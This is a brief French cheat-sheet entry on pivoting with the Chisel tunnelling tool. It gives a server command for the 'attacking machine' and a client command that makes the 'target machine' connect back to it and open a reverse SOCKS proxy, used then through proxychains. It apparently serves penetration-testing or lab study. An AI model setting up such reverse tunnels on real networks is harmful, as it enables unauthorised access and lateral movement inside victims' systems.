Pivoting

Pivoter avec Chisel

Chisel est un tunnel TCP/UDP qui transporte les données via HTTP, et les sécurise avec SSH. Écrit en Go, il inclue à la fois un client et un serveur. [Github]

Sur la machine attaquante :

chisel server -p $PORT --reverse

Sur la machine cible :

chisel client $SERVER_IP:$PORT R:socks

Il faut ensuite préfixer de proxychains toutes les commandes que l’on souhaite effectuer depuis la machine cible.